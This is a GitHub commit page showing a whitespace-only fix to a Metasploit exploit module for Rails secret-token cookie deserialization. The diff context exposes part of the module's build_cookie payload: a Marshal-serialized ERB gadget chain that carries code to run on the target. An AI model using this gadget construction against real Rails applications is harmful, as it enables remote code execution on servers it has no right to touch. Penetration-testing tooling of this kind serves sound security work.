Skip to content

Commit ff1c839

Browse files
committed
appease msftidy
trailing whitespace
1 parent 17bad7b commit ff1c839

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/multi/http/rails_secret_deserialization.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -202,7 +202,7 @@ def build_cookie
202202
":\x0E@instanceo" +
203203
":\bERB\x07" +
204204
":\t@src"+ Marshal.dump(code)[2..-1] +
205-
":\x0c@lineno"+ "i\x00" +
205+
":\x0c@lineno"+ "i\x00" +
206206
":\f@method:\vresult:" +
207207
"\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
208208
end
@@ -213,7 +213,7 @@ def build_cookie
213213
"o"+":\x08ERB"+"\x07" +
214214
":\x09@src" +
215215
Marshal.dump(code)[2..-1] +
216-
":\x0c@lineno"+ "i\x00" +
216+
":\x0c@lineno"+ "i\x00" +
217217
":\x0C@method"+":\x0Bresult"
218218
end
219219
end

0 commit comments

Comments
 (0)